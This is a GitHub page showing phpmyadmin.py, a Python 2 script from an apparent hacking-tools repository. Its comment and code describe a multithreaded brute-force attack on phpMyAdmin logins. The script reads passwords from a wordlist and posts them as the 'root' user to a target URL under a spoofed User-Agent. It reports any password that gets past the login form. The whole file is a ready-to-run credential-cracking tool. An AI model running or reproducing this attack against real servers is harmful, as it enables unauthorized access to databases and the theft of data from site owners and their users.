forked from backlion/hack-for-tools
-
Notifications
You must be signed in to change notification settings - Fork 0
/
phpmyadmin.py
53 lines (44 loc) · 1.34 KB
/
phpmyadmin.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: IcySun
# 脚本功能:暴力破解phpMyadmin密码
from Queue import Queue
import threading,sys
import requests
def use():
print '#' * 50
print '\t Crack Phpmyadmin root\'s pass'
print '\t\t\t Code By: IcySun'
print '\t python crackPhpmyadmin.py http://xx.com/phpmyadmin/ \n\t (default user is root)'
print '#' * 50
def crack(password):
global url
payload = {'pma_username': 'root', 'pma_password': password}
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
r = requests.post(url, headers = headers, data = payload)
if 'name="login_form"' not in r.content:
print '[*] OK! Have Got The Pass ==> %s' % password
class MyThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
global queue
while not queue.empty():
password = queue.get()
crack(password)
def main():
global url,password,queue
queue = Queue()
url = sys.argv[1]
passlist = open('password.txt','r')
for password in passlist.readlines():
password = password.strip()
queue.put(password)
for i in range(10):
c = MyThread()
c.start()
if __name__ == '__main__':
if len(sys.argv) != 2 :
use()
else:
main()